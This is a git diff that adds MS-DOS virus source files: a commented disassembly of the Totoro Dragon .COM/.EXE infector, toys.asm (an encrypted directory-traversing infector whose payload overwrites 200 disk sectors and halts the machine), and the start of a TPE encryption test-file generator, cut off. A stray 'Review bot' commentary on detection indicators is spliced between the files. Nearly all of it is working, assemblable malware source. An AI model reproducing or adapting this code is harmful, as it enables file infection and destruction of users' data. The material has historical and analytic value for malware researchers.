@@ -0,0 +1,713 @@ +;TOTORO DRAGON disassembly. Included, for your pleasure, in Crypt +;Newsletter 14. Profuse thanks to Stormbringer, wherever he is. + +;*************************************************************************** +;* The Totoro Dragon Virus from Taiwan * +;*************************************************************************** +;* This virus is a fairly simple resident .EXE/.COM infector. It goes * +;*resident by re-executing the infected file and using Int 21, function 31.* +;*When it infects a .COM, it puts itself at the beginning of the file and * +;*starts the host at an offset of 600h (700h in memory), giving the virus * +;*an effective length of 1536 bytes, plus an extra 4 bytes for its marker * +;*at the end ("YTIT"). It infects .EXE files using the "standard" method. * +;*While it does save file attributes, the time and date change when a file * +;*is infected. The virus activates on Saturdays. When active, it installs* +;*an Int 08 (Timer click) handler that counts to 0CCCh, then shoves the * +;*text off the screen and prints the following in the upper left-hand * +;*corner: * +;* * +;* ķ * +;* Totoro Dragon * +;* Hello! I am TOTORO CAT * +;* Written by Y.T.J.C.T * +;* in Ping Tung. TAIWAN * +;* Don't Worry,be Happy * +;* Ľ * +;* * +;*It then restarts the counter and does it again. Other that this effect, * +;*the virus seems relatively harmless. 
* +;* * +;* * +;* Disassembly by Stormbringer * +;*************************************************************************** +.model tiny +.radix 16 +.code + org 100h + +start: + jmp short COM_Entry_Point + nop +;*************************************************************************** +;* Data Tables * +;*************************************************************************** +File_Size_Off dw 5 +File_Size_Seg dw 0 +TSR_DAT dw 4262h +DS_Save dw 0F21h +ES_Save dw 0F21h +File_Attribs dw 20h +IP_Save dw 0 +CS_Save dw 0F99 +SP_Save dw 0 +SS_Save dw 0 +File_Type db 'C' + +Wasted_Space db 0, 0, 0 ;? + +;******************************************** +; EXE_Header ; +;******************************************** + EXE_Sig db 'MZ' + Last_Page_Len dw 14h + EXE_Size dw 5 + Rel_Tbl_Items dw 0 + Header_Size dw 20h + Minalloc dw 0 + Maxalloc dw 0ffff + Init_SS dw 1 + Init_SP dw 700h + Checksum dw 0 + Init_IP dw 91h + Init_CS dw 1 + First_Rel dw 001Eh + Overlay_Num dw 0 +;******************************************** + +CS_Store dw 0 +Command db 'COMMAND.COM', 0 + db 00h, 80h, 00h +ES_Store_1 dw 0F21h + dw 5Ch +ES_Store_2 dw 0F21h + dw 6Ch +ES_Store_3 dw 0F21h +File_Handle dw 5 + +Buffer_For_Checks db 0 + db 4Ch,0CDh, 21h + +File_Name_Off dw 469h +File_Name_Seg dw 0DF5h + db 0 +Mem_Seg dw 0F93h +IP_24 dw 156h +CS_24 dw 0DF5h + +;************************************************************************ +;* Virus Entry Point #1 (COM) * +;************************************************************************ +COM_Entry_Point: + mov ax,0F1F1h ;Is the virus in memory? + int 21h + mov cs:CS_Store,0 + mov cs:[ES_Save],es + cmp ax,0F1F1h ;AX preserved? + je Already_Installed ;Same? go Already_Installed + jmp Install_Virus ;Not In Mem? 
go Install_Virus + +Already_Installed: ;Restore control to host file (COM) + mov ax,cs + mov es,ax ;ES = DS = CS + mov ds,ax + mov ah,0CBh ;Restore Control + mov si,700h ;Offset of host in file + mov di,100h ;Original offset of host + mov cx,cs:[File_Size_Off] ;Size of host file + + int 21h ;Call internal routine to restore control + ;to host .COM file. + +;************************************************************************ +;* Virus Entry Point #2 (EXE) * +;************************************************************************ +EXE_Entry_Point: + mov ax,cs + sub ax,10h + push ax + mov ax,offset After_Jump + push ax + retf ;Jump to After_Jump with + ;original .COM offsets. +After_Jump: + mov cs:[ES_Save],es + mov cs:[DS_Save],ds + mov ax,0F1F1h + int 21h + cmp ax,0F1F1h ;Check if installed. + jne Get_New_Seg ;Nope, Install.... + + cli + mov ax,cs:[SS_Save] ;Yes, restore host regs + add ax,10h + mov bx,es + add ax,bx + mov ss,ax + mov sp,cs:[SP_Save] + sti + + mov ax,cs:[CS_Store] + mov bx,es + add ax,bx + add ax,10h + mov word ptr cs:[IP_Save+2],ax + jmp dword ptr cs:[IP_Save] ;Restore Control to + ;.EXE host. + +Get_New_Seg: + push es ;For later RETF + xor ax,ax + mov ds,ax ;DS = 0 + +;**************************************************************************** +;*NOTE: From 0:200 to 0:400 there is some "empty" space, as it is the upper * +;* (unused) part of the interrupt tables. This virus uses the top three* +;* bytes, i.e. the INT 99 entry, to run a repnz movsb command followed * +;* by a retf. This is to copy the virus to a new segment in memory and* +;* jump to it. 
* +;**************************************************************************** + + mov word ptr ds:[3fdh],0A4F3h ;repnz movsb + mov byte ptr ds:[3ffh],0CBh ;retf + + push cs + pop ds + + mov si,100h + mov di,si ;Copy virus to new segment + mov cx,600h ;and "RETF" to + mov ax,offset Install_Virus ;Install_Virus in new copy + push ax + db 0EAh,0FDh, 03h, 00h, 00h ;Jump far 0:3FDh + +Install_Virus: + cli ;Disable interrupts + push cs + pop ds + mov ah,2Ah + int 21h ;Get Day/Date + + cmp al,6 ;Is it Saturday? + jne Set_Int_21 ;Nope, don't activate, just + mov ax,3508h ;infect files. + int 21h ;Get Int 08 address + + mov word ptr cs:[IP_08],bx + mov word ptr cs:[CS_08],es + mov dx,offset Int_08 + mov ax,2508h + int 21h ;Set Int 08 + +Set_Int_21: + mov ax,3521h + int 21h ;Get Int 21 address + + mov word ptr cs:[IP_21],bx + mov word ptr cs:[CS_21],es + mov dx,offset Int_21 + mov ax,2521h + int 21h ;Set Int_21 + + mov es,cs:[ES_Save] + cmp cs:[TSR_DAT],426Bh ;Second Execute? + je Go_TSR ;Yep, go TSR + + mov bx,1000h ;Nope, set up for second exec. + mov ah,4Ah + int 21h ;Change Mem Allocation + ;to 64k. + + mov es,es:[2ch] ;Environment string + xor di,di + xor al,al + mov cx,7FFFh + +Find_Filename: ;Search Environment for + repne scasb ;filename of host. + cmp es:[di],al + loopnz Find_Filename + + add di,3 ;Skip drive designator + ;i.e. "C:\" in + ;"C:\Infected.EXE" + mov dx,di + + push es + pop ds ;DS:DX = host filename + push cs + pop es + + cli ;Clears Ints (so none can + ;disrupt second execution + ;of virus) + + mov ax,cs:[ES_Save] + mov cs:[ES_Store_1],ax + mov cs:[ES_Store_2],ax + mov cs:[ES_Store_3],ax + mov bx,144h + mov ax,4B00h ;Re-Execute the file + pushf + call dword ptr cs:[IP_21] ;Call Int 21 to Execute file. + +Go_TSR: + mov ah,31h + mov dx,71h + int 21h ;Terminate and Stay Resident. + +Int_21: + pushf ;Push flags + cmp ax,0F1F1h ;Is it an Install Check? 
+ jne Is_It_Execute ;No, Go Is_It_Execute + mov ax,0F1F1h ;Yes, save value (unneccesary) + popf + iret ;Return to virus in program. + +Is_It_Execute: + cmp ax,4B00h ;Is it a Load & Execute call? + jne Restore_Host ;Nope, continue on. + call execute ;Infect the file if possible. + jmp short Go_Int_21 ;And go to old Int 21 handler. + nop +Restore_Host: + cmp ah,0CBh ;Is it a request to restore + jne Go_Int_21 ;control to host? + pop ax ax ;Pop flags + Old IP (not kept) + mov word ptr cs:[IP_Save],100h + pop ax + mov word ptr cs:[IP_Save+2],ax + rep movsb ;Restore Host to orig. Pos. + popf ;Completely remove old Int call + mov ax,0 + jmp dword ptr cs:[IP_Save] ;Jump to Host:100 +Go_Int_21: + popf ; Pop flags + + db 0ea ;Jump to Int 21 +IP_21 dw 040ebh +CS_21 dw 0011 + + +execute: + push es ds ax bx cx dx si di + mov cs:[File_Name_Seg],ds + mov cs:[File_Name_Off],dx + mov ax,3524h ;Get Int 24 Address + int 21h ;(Critical Error) + + mov cs:[IP_24],bx + mov cs:[CS_24],es + push cs + pop ds + mov dx,offset Int_24 + mov ax,2524h + int 21h ;Set Int 24 + + mov ds,cs:[File_Name_Seg] + mov si,cs:[File_Name_Off] + +Name_Check: + lodsb + or al,al ;Is the first byte a zero? + jnz Name_Check ;Nope, find end of string + mov al,[si-2] + and al,0DFh + cmp al,4Dh ;'M' + je Is_Com ;COM file, jump Is_Com + cmp al,45h ;'E' + je Is_EXE ;EXE file, jump Is_EXE + jmp Clean_Up ;Neither? Go Clean_Up +Is_Com: + mov cs:[File_Type],'C' ;Save File type for later. + jmp short Check_If_Command + nop +Is_EXE: + mov cs:[File_Type],'E' + +Check_If_Command: + sub si,0Ch + mov di,offset Command + push cs + pop es + mov cx,0Bh ;Is it Command.COM? + repe cmpsb + jnz Start_Infect ;No, Jump Start_Infect +Got_An_Error: + jmp Clean_Up ;Is Command, get otta here. 
+ +Start_Infect: + mov ds,cs:[File_Name_Seg] + mov dx,cs:[File_Name_Off] + mov ax,4300h + int 21h ;Get Attribs + + jc Got_An_Error + mov cs:[File_Attribs],cx + xor cx,cx + mov ax,4301h + int 21h ;Zero Attrib's for read/write + + jc Got_An_Error + mov ax,3D02h + int 21h ;Open Read/Write + + jnc Check_Infect ;Everything Fine? go Check_Infect + jmp Reset_Attribs ;Couldn't Open, go Reset_Attribs + +Check_Infect: + mov bx,ax + mov cs:[File_Handle],ax + mov cx,0FFFFh + mov dx,0FFFCh + mov ax,4202h + int 21h ;Move to 4 bytes from end + + add ax,4 + mov cs:[File_Size_Off],ax + push cs + pop ds + mov dx,offset Buffer_For_Checks + mov cx,4 + mov ah,3Fh + int 21h + ;Read in Last 4 bytes of file + push cs + pop es + mov cx,4 + mov si,offset Marker ;are last 4 bytes 'YTIT'? + mov di,offset Buffer_For_Checks ; + repe cmpsb + jnz Check_Which_Type ;Not infected? Go Check_Which_Type + jmp Close_File ;Infected? Go Close_File + +Check_Which_Type: + cmp cs:[File_Type],'C' ;Is it a .COM? + je COM_Infect ;Yes, go COM_Infect + jmp EXE_Infect ;No, go EXE_Infect + +COM_Infect: + mov ah,48h + mov bx,1000h + int 21h ;Allocate 64k of memory + + jnc Load_In_File ;No Prob? Go Load_In_File + jmp Close_File ;Otherwise, go Close_File + +Load_In_File: + mov cs:[Mem_Seg],ax + mov bx,cs:[File_Handle] + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ;Go to beginning of file + + push cs + pop ds + mov es,cs:[Mem_Seg] + + mov si,100 + + mov di,si + mov cx,700h + rep movsb + mov ds,cs:Mem_Seg + mov cx,cs:[File_Size_Off] + mov dx,700h + mov ah,3Fh ;Load entire file to directly + int 21h ;after virus. 
+ + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ;Move to the beginning of file + + mov dx,100h + mov cx,cs:[File_Size_Off] + add cx,600h + mov ah,40h + int 21h ;Write entire file back to disk + + jc Go_Release_Mem + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ;Move to end of file + + mov cs:[File_Size_Seg],0 ;COM < 64k + add ax,4 ;Add 4 for marker bytes + mov cs:[File_Size_Off],ax ;Save file size + push cs + pop ds + mov dx,offset Marker + mov cx,4 + mov ah,40h + int 21h ;Write in marker 'YTIT' + +Go_Release_Mem: + jmp Release_Mem + jmp Close_File + +EXE_Infect: + xor cx,cx + xor dx,dx + mov ax,4200h + int 21h ;Move to beginning of file + + push cs + pop ds + db 8dh,16h,1bh,01 ;lea dx,cs:[11Bh] + mov cx,1Ch + mov ah,3Fh + int 21h ;Read in .EXE header + +Save_Header_NFO: + cli ;clear ints + mov ax,cs:[Init_CS] + mov cs:[CS_Store],ax ;Save old CS + mov ax,cs:[Init_IP] + mov word ptr cs:[IP_Save],ax ;Save old IP + mov ax,cs:[Init_SS] + mov cs:[SS_Save],ax ;Save old SS + mov ax,cs:[Init_SP] + mov cs:[SP_Save],ax ;Save old SP + sti ;restore ints + + xor ax,ax + cmp cs:[Last_Page_Len],0 + je Calculate_Exe_Header + dec cs:[EXE_Size] + +Calculate_Exe_Header: ;Long, drawn out way + ;to calculate new EXE header + mov cx,200h + xor dx,dx + mov ax,cs:[EXE_Size] + mul cx + add ax,cs:[Last_Page_Len] + add ax,0Fh + adc dx,0 + and ax,0FFF0h + mov cs:[File_Size_Off],ax + mov cs:[File_Size_Seg],dx + push dx ax dx ax + xor dx,dx + mov ax,cs:[Header_Size] + mov cx,10h + mul cx + pop bx cx + sub bx,ax + sbb cx,dx + xchg ax,bx + xchg dx,cx + mov cx,10h + div cx + mov cs:[Init_CS],ax + mov cs:[Init_SS],ax + mov cs:[Init_SP],700h + mov cs:[Init_IP],offset EXE_Entry_Point-100 + pop ax dx + push dx ax + add ax,604h + adc dx,0 + mov cx,200h + div cx + mov cs:Last_Page_Len,dx + or dx,dx + jz Rewrite_Header + inc ax + +Rewrite_Header: + mov cs:[EXE_Size],ax + xor cx,cx + xor dx,dx + mov bx,cs:[File_Handle] + mov ax,4200h + int 21h ;Move back to beginning of file + + push cs + pop ds + 
mov dx,offset EXE_Sig + mov cx,1Ch + mov ah,40h + int 21h ;Write EXE header back to file + + pop dx + pop cx + jc Close_File + mov ax,4200h + int 21h ;Go to end of host. + + push cs + pop ds + mov dx,100 + mov cx,600h + mov ah,40h + int 21h ;Write Virus + jc Close_File + + xor cx,cx + xor dx,dx + mov ax,4202h + int 21h ;Go to end of file. + + mov dx,offset Marker + mov cx,4 + mov ah,40h + int 21h ;Write marker byte. + + jmp short Close_File + nop +Release_Mem: + mov es,cs:Mem_Seg + mov ah,49h + int 21h ;Release Memory + +Close_File: + mov ah,3Eh + mov bx,cs:[File_Handle] + int 21h ;Close file. + +Reset_Attribs: + mov ds,cs:File_Name_Seg + mov dx,cs:File_Name_Off + mov cx,cs:File_Attribs + mov ax,4301h + int 21h ;Reset File attributes + +Clean_Up: + mov ds,cs:[CS_24] ;Restore Critical Error + mov dx,cs:[IP_24] + mov ax,2524h + int 21h + + pop di si dx cx bx ax ds es + retn + + +Int_24: ;Critical Error Handler + xor ax,ax + iret + +Int_08: ;Timer Click Handler + pushf + inc cs:[Activation_Counter] + cmp cs:[Activation_Counter],0CCCh + jne Go_Int_08 + mov cs:[Activation_Counter],0 ;Reset Counter + push ds es si di ax bx cx dx + call Get_Mode + call Scroll_Area + call Print_Message + pop dx cx bx ax di si es ds +Go_Int_08: + popf ; Pop flags + db 0EA +IP_08 dw 003Ch +CS_08 dw 0D80h + +Screen_Width dw 0 +Activation_Counter dw 1E0h + +Get_Mode: + mov ah,0Fh + int 10h ;Get Video Mode + + mov bx,0B000h ;Mode 7 Text Video Memory + mov es,bx + cmp al,7 + je In_Mode_7 + mov bx,0B800h ;Regular Text Video Memory +In_Mode_7: + mov es,bx + mov ds,bx + mov cs:[Screen_Width],4Fh + +Setup_Screen: + mov cx,19h + mov bx,0 +Clear_Screen: + push cx + call Scroll_Line + add bx,0A0h + pop cx + loop Clear_Screen + + dec cs:[Screen_Width] + jnz Setup_Screen + retn + +Scroll_Line: ;This subroutine clears the + mov di,bx ;screen by scrolling the text + mov si,bx ;straight off of the left + add si,2 ;side. 
+ mov cx,cs:[Screen_Width] + +Scroll_Sideways: + lodsb + stosb + inc si + inc di + loop Scroll_Sideways + retn + +Print_Message: + xor bx,bx + push cs + pop ds + db 8dh,36h,18h,06 ;lea si,cs:[Totoro_Design] + mov ah,0Eh +Print_Loop: + lodsb + int 10h ;Write Char in Teletype mode + cmp byte ptr [si],24h ;is it a '$'? + jne Print_Loop ;Nope, continue writing + retn + +Scroll_Area: + xor bx,bx ;Video Page 0 + mov ah,3 + int 10h ;Get Cursor info + + push dx ;Push Cursor Location (DX) + mov ah,6 + mov bh,7 + mov al,18h + xor cx,cx + mov dh,18h + mov dl,4Fh + int 10h ;Scroll up (clear screen) + + mov ah,2 + pop dx + sub dh,2 + xor bx,bx + int 10h ;Reset Cursor + + xor bx,bx + xor dx,dx + mov ah,2 + int 10h ;Set Cursor for printing. + retn + +Totoro_Design: + db ' ķ',0Dh, 0Ah + db ' Totoro Dragon ',0Dh, 0Ah + db ' Hello! I am TOTORO CAT',0Dh, 0Ah + db ' Written by Y.T.J.C.T ',0Dh, 0Ah + db ' in Ping Tung. TAIWAN ',0Dh, 0Ah + db ' Don''t Worry,be Happy ',0Dh, 0Ah + db ' Ľ$' +Marker db 'YTIT' + db 28 dup (0) + +;*************************************************************************** +;*End of virus. The bytes below this line are the infected program and the * +;* viruses' identification bytes. * +;*************************************************************************** + +Host_Program: + mov ax,4c00 + int 21 + +Infected_Mark db 'YTIT' +end start diff --git a/MSDOS/Virus.MSDOS.Unknown.toys.asm b/MSDOS/Virus.MSDOS.Unknown.toys.asm new file mode 100644 index 00000000..cc1d0cc8 --- /dev/null +++ b/MSDOS/Virus.MSDOS.Unknown.toys.asm 
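Review bot: The NOTE block above `mov word ptr ds:[3fdh],0A4F3h` says the virus uses 'the INT 99 entry', but 0:3FDh–0:3FFh is the upper three bytes of the INT 0FFh vector (slot 3FCh–3FFh); neither INT 99h (slot 264h) nor decimal 99 (slot 18Ch) covers that address, so the comment names the wrong vector and should read `;* bytes at 0:3FDh-0:3FFh, the tail of the INT 0FFh vector, to run a repnz movsb`. `Int_24` returns with AX=0, which is the INT 24h 'ignore' response, so any critical error raised during infection is swallowed until `Clean_Up` restores the saved `CS_24:IP_24`; a one-line comment there, `;AX=0 -> 'ignore': critical errors during infection never reach the user`, saves a lookup. For analysts the durable identifiers in this hunk are the `F1F1h` install check answered in `Int_21`, the 'YTIT' `Marker` written as the last four bytes of every infected file (`Check_Infect` seeks to -4 and compares it), and the 600h-byte prefix with the host moved to offset 700h for .COM infections; the header text states these, but a short `;Indicators: F1F1h install check, 'YTIT' trailer, 600h prefix / host at 700h` next to `Marker db 'YTIT'` would keep them with the data. The header also says the time and date change on infection, which the code confirms by saving and restoring only `File_Attribs` via 4300h/4301h and never calling 5701h — worth stating at `Reset_Attribs` so the detection clue is explicit.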
@@ -0,0 +1,381 @@
+; toys.asm : Unknown by Unknown
+; Created wik the Phalcon/Skism Mass-Produced Code Generator
+; from the configuration file skeleton.cfg
+
+.model tiny ; Handy directive
+.code ; Virus code segment
+ org 100h ; COM file starting IP
+
+id = 'FZ' ; ID word for EXE infections
+entry_point: db 0e9h,0,0 ; jmp decrypt
+
+decrypt: loop decrypt ; handles encryption and decryption
+patch_startencrypt:
+ mov si,offset startencrypt ; start of decryption
+ mov dx,(offset heap - offset startencrypt)/2 ; iterations
+decrypt_loop:
+ db 2eh,81h,34h ; xor word ptr cs:[si], xxxx
+decrypt_value dw 0 ; initialised at zero for null effect
+ inc si ; calculate new decryption location
+ inc si
+ dec dx ; If we are not done, then
+ jnz decrypt_loop ; decrypt mo'
+startencrypt:
+ call next ; calculate delta offset
+next: pop bp ; bp = IP next
+ sub bp,offset next ; bp = delta offset
+
+ cmp sp,id ; COM or EXE?
+ je restoreEXE
+restoreCOM:
+ lea si,[bp+save3]
+ mov di,100h
+ push di ; For later return
+ movsb
+ jmp short restoreEXIT
+restoreEXE:
+ push ds
+ push es
+ push cs ; DS = CS
+ pop ds
+ push cs ; ES = CS
+ pop es
+ lea si,[bp+jmpsave2]
+ lea di,[bp+jmpsave]
+ movsw
+ movsw
+ movsw
+restoreEXIT:
+ movsw
+
+ mov byte ptr [bp+numinfec],2 ; reset infection counter
+
+ mov ah,1Ah ; Set new DTA
+ lea dx,[bp+newDTA] ; new DTA @ DS:DX
+ int 21h
+
+ mov ah,47h ; Get current directory
+ mov dl,0 ; Current drive
+ lea si,[bp+origdir] ; DS:SI->buffer
+ int 21h
+ mov byte ptr [bp+backslash],'\' ; Prepare for later CHDIR
+
+ mov ax,3524h ; Get int 24 handler
+ int 21h ; to ES:BX
+ mov word ptr [bp+oldint24],bx; Save it
+ mov word ptr [bp+oldint24+2],es
+ mov ah,25h ; Set new int 24 handler
+ lea dx,[bp+offset int24] ; DS:DX->new handler
+ int 21h
+ push cs ; Restore ES
+ pop es ; 'cuz it was changed
+
+dir_scan: ; "dot dot" traversal
+ lea dx,[bp+exe_mask]
+ call infect_mask
+ lea dx,[bp+com_mask]
+ call infect_mask
+ mov ah,3bh ; change directory
+ lea dx,[bp+dot_dot] ; "cd .."
+ int 21h
+ jnc dir_scan ; go back for mo!
+
+done_infections:
+ mov ah,2ah ; Get current date
+ int 21h
+ cmp dh,6 ; Check month
+ cmp dl,19 ; Check date
+ jb exit_virus
+ cmp al,-1 ; Check date of week
+ jz activate
+
+ mov ah,2ch ; Get current time
+ int 21h
+ cmp ch,18 ; Check the hour
+ jnz exit_virus
+ cmp cl,-1 ; Check the minute
+ jnz exit_virus
+ cmp dh,-1 ; Check the seconds
+ jnz exit_virus
+exit_virus:
+ mov ax,2524h ; Restore int 24 handler
+ lds dx,[bp+offset oldint24] ; to original
+ int 21h
+ push cs
+ pop ds
+
+ mov ah,3bh ; change directory
+ lea dx,[bp+origdir-1] ; original directory
+ int 21h
+
+ mov ah,1ah ; restore DTA to default
+ mov dx,80h ; DTA in PSP
+ cmp sp,id-4 ; EXE or COM?
+ jz returnEXE
+returnCOM:
+ int 21h
+ retn ; 100h is on stack
+returnEXE:
+ pop es
+ pop ds
+ int 21h
+ mov ax,es ; AX = PSP segment
+ add ax,10h ; Adjust for PSP
+ add word ptr cs:[bp+jmpsave+2],ax
+ add ax,word ptr cs:[bp+stacksave+2]
+ cli ; Clear intrpts for stack manipulation
+ mov sp,word ptr cs:[bp+stacksave]
+ mov ss,ax
+ sti
+ db 0eah ; jmp ssss:oooo
+jmpsave dd ? ; Original CS:IP
+stacksave dd ? ; Original SS:SP
+jmpsave2 db ? ; Actually four bytes
+save3 db 0cdh,20h,0 ; First 3 bytes of COM file
+stacksave2 dd ?
+
+activate: mov si,offset data00 ; SI points to data
+ mov ah,0Eh ; BIOS display char. function
+display_loop: lodsb ; Load the next char. into AL
+ or al,al ; Is the character a null?
+ je disp_strnend ; If it is, exit
+ int 010h ; BIOS video interrupt
+ jmp short display_loop ; Do the next character
+disp_strnend:
+
+ mov ax,0002h ; First argument is 2
+ mov cx,00C8h ; Second argument is 200
+ cli ; Disable interrupts (no Ctrl-C)
+ cwd ; Clear DX (start with sector 0)
+ int 026h ; DOS absolute write interrupt
+ sti ; Restore interrupts
+
+ cli ; Clear the interrupt flag
+ hlt ; HaLT the computer
+ jmp short $ ; Just to make sure
+
+ jmp exit_virus
+
+data00 db 10,13,"All my toys are broken",13,10
+ db "And so am I inside.",13,10
+ db "The carnival has closed",13,10
+ db "Years ago...",13,10,0
+
+;creator db '[MPC]',0 ; Mass Produced Code Generator
+
+infect_mask:
+ mov ah,4eh ; find first file
+ mov cx,7 ; any attribute
+findfirstnext:
+ int 21h ; DS:DX points to mask
+ jc exit_infect_mask ; No mo files found
+
+ mov al,0h ; Open read only
+ call open
+
+ mov ah,3fh ; Read file to buffer
+ lea dx,[bp+buffer] ; @ DS:DX
+ mov cx,1Ah ; 1Ah bytes
+ int 21h
+
+ mov ah,3eh ; Close file
+ int 21h
+
+ cmp word ptr [bp+buffer],'ZM'; EXE?
+ jz checkEXE ; Why yes, yes it is!
+checkCOM:
+ mov ax,word ptr [bp+newDTA+1Ah] ; Filesize in DTA
+ cmp ax,50000 ; Is it too large?
+ ja find_next
+
+ mov bx,word ptr [bp+buffer+1]; get jmp location
+ add bx,heap-decrypt+3 ; Adjust for virus size
+ cmp ax,bx
+ je find_next ; already infected
+ jmp infect_com
+checkEXE: cmp word ptr [bp+buffer+10h],id ; is it already infected?
+ jnz infect_exe
+find_next:
+ mov ah,4fh ; find next file
+ jmp short findfirstnext
+exit_infect_mask: ret
+
+infect_exe:
+ les ax, dword ptr [bp+buffer+14h] ; Save old entry point
+ mov word ptr [bp+jmpsave2], ax
+ mov word ptr [bp+jmpsave2+2], es
+
+ les ax, dword ptr [bp+buffer+0Eh] ; Save old stack
+ mov word ptr [bp+stacksave2], es
+ mov word ptr [bp+stacksave2+2], ax
+
+ mov ax, word ptr [bp+buffer + 8] ; Get header size
+ mov cl, 4 ; convert to bytes
+ shl ax, cl
+ xchg ax, bx
+
+ les ax, [bp+offset newDTA+26]; Get file size
+ mov dx, es ; to DX:AX
+ push ax
+ push dx
+
+ sub ax, bx ; Subtract header size from
+ sbb dx, 0 ; file size
+
+ mov cx, 10h ; Convert to segment:offset
+ div cx ; form
+
+ mov word ptr [bp+buffer+14h], dx ; New entry point
+ mov word ptr [bp+buffer+16h], ax
+
+ mov word ptr [bp+buffer+0Eh], ax ; and stack
+ mov word ptr [bp+buffer+10h], id
+
+ pop dx ; get file length
+ pop ax
+
+ add ax, heap-decrypt ; add virus size
+ adc dx, 0
+
+ mov cl, 9
+ push ax
+ shr ax, cl
+ ror dx, cl
+ stc
+ adc dx, ax
+ pop ax
+ and ah, 1 ; mod 512
+
+ mov word ptr [bp+buffer+4], dx ; new file size
+ mov word ptr [bp+buffer+2], ax
+
+ push cs ; restore ES
+ pop es
+
+ push word ptr [bp+buffer+14h] ; needed later
+ mov cx, 1ah
+ jmp short finishinfection
+infect_com: ; ax = filesize
+ mov cx,3
+ sub ax,cx
+ lea si,[bp+offset buffer]
+ lea di,[bp+offset save3]
+ movsw
+ movsb
+ mov byte ptr [si-3],0e9h
+ mov word ptr [si-2],ax
+ add ax,103h
+ push ax ; needed later
+finishinfection:
+ push cx ; Save # bytes to write
+ xor cx,cx ; Clear attributes
+ call attributes ; Set file attributes
+
+ mov al,2
+ call open
+
+ mov ah,40h ; Write to file
+ lea dx,[bp+buffer] ; Write from buffer
+ pop cx ; cx bytes
+ int 21h
+
+ mov ax,4202h ; Move file pointer
+ xor cx,cx ; to end of file
+ cwd ; xor dx,dx
+ int 21h
+
+ mov ah,2ch ; Get current time
+ int 21h ; dh=sec,dl=1/100 sec
+ mov [bp+decrypt_value],dx ; Set new encryption value
+ lea di,[bp+code_store]
+ mov ax,5355h ; push bp,push bx
+ stosw
+ lea si,[bp+decrypt] ; Copy encryption function
+ mov cx,startencrypt-decrypt ; Bytes to move
+ push si ; Save for later use
+ push cx
+ rep movsb
+
+ lea si,[bp+write] ; Copy writing function
+ mov cx,endwrite-write ; Bytes to move
+ rep movsb
+ pop cx
+ pop si
+ pop dx ; Entry point of virus
+ push di
+ push si
+ push cx
+ rep movsb ; Copy decryption function
+ mov ax,5b5dh ; pop bx,pop bp
+ stosw
+ mov al,0c3h ; retn
+ stosb
+
+ add dx,offset startencrypt - offset decrypt ; Calculate new
+ mov word ptr [bp+patch_startencrypt+1],dx ; starting offset of
+ call code_store ; decryption
+ pop cx
+ pop di
+ pop si
+ rep movsb ; Restore decryption function
+
+ mov ax,5701h ; Restore creation date/time
+ mov cx,word ptr [bp+newDTA+16h] ; time
+ mov dx,word ptr [bp+newDTA+18h] ; date
+ int 21h
+
+ mov ah,3eh ; Close file
+ int 21h
+
+ mov ch,0
+ mov cl,byte ptr [bp+newDTA+15h] ; Restore original
+ call attributes ; attributes
+
+ dec byte ptr [bp+numinfec] ; One mo infection
+ jnz mo_infections ; Not enough
+ pop ax ; remove call from stack
+ jmp done_infections
+mo_infections: jmp find_next
+
+open:
+ mov ah,3dh
+ lea dx,[bp+newDTA+30] ; filename in DTA
+ int 21h
+ xchg ax,bx
+ ret
+
+attributes:
+ mov ax,4301h ; Set attributes to cx
+ lea dx,[bp+newDTA+30] ; filename in DTA
+ int 21h
+ ret
+
+write:
+ pop bx ; Restore file handle
+ pop bp ; Restore relativeness
+ mov ah,40h ; Write to file
+ lea dx,[bp+decrypt] ; Concatenate virus
+ mov cx,heap-decrypt ; # bytes to write
+ int 21h
+ push bx
+ push bp
+endwrite:
+
+int24: ; New int 24h (error) handler
+ mov al,3 ; Fail call
+ iret ; Return control
+
+exe_mask db '*.exe',0
+com_mask db '*.com',0
+dot_dot db '..',0
+heap: ; Variables not in code
+; The following code is the buffer for the write function
+code_store: db (startencrypt-decrypt)*2+(endwrite-write)+1 dup (?)
+oldint24 dd ? ; Storage for old int 24h handler
+backslash db ?
+origdir db 64 dup (?) ; Current directory buffer
+newDTA db 43 dup (?) ; Temporary DTA
+numinfec db ? ; Infections this run
+buffer db 1ah dup (?) ; read buffer
+endheap: ; End of virus
+end entry_point
diff --git a/MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm b/MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm
new file mode 100644
index 00000000..db5c4418
--- /dev/null
+++ b/MSDOS/Virus.MSDOS.Unknown.tpe-gen.asm
@@ -0,0 +1,101 @@
+;----------------------------------------------------------------------------
+; TPE-GEN - This program generates 50 TPE encrypted test files
+;
+; This source can be compiled with MASM 5.0 or TASM 2.01
+; (and perhaps others too, but this is not tested.)
+;----------------------------------------------------------------------------
+
+ .model tiny
+ .RADIX 16
+
+ .code
+
+ extrn crypt:near ;external routines in engine
+ extrn rnd_get:near
+ extrn rnd_init:near
+
+
+ org 0100
+
+begin: call rnd_init ;init. random number generator
+
+ mov dx,offset starttxt ;print message
+ mov ah,09
+ int 21
+
+ mov cx,50d ;repeat 50 times
+lop: push cx
+
+ mov ah,3C ;create a new file
+ mov dx,offset filename
+ mov cx,0020
+ int 21
+ xchg ax,bx
+
+ push ds
+ push es
+ push bx
+
+ mov ax,cs ;input parameters for engine
+ mov ds,ax
+ add ax,0400
+ mov es,ax ;ES = DS + 400h
+ xor si,si ;code will be right after decr.
+ mov dx,offset hello ;this will be encrtypted
+ mov cx,100d ;length of code to encrypt
+ mov bp,0100 ;decryptor will start at 100h
+ call rnd_get ;AX register will be random
+
+ call crypt ;call the engine
+
+ pop bx ;write crypted file
+ mov ah,40
+ int 21
+
+ mov ah,3E ;close the file
+ int 21
+
+ pop es
+ pop ds
+
+ mov di,offset filename ;adjust name for next file
+ mov bx,7 ; (increment number)
+incnum: inc byte ptr ds:[bx+di]
+ cmp byte ptr ds:[bx+di],'9'
+ jbe numok
+ mov byte ptr ds:[bx+di],'0'
+ dec bx
+ jnz incnum
+
+numok: pop cx ;do it again...
+ loop lop
+
+exit: int 20
+
+
+;----------------------------------------------------------------------------
+; Text and data
+;----------------------------------------------------------------------------
+
+starttxt db 'TPE-GEN - Generates 50 TPE encrypted test files.'
+ db 0Dh, 0Ah, '$'
+
+filename db '00000000.COM',0
+
+
+;----------------------------------------------------------------------------
+; The small test file that will be encrypted
+;----------------------------------------------------------------------------
+
+hello: call next ;get relative offset
+next: pop dx
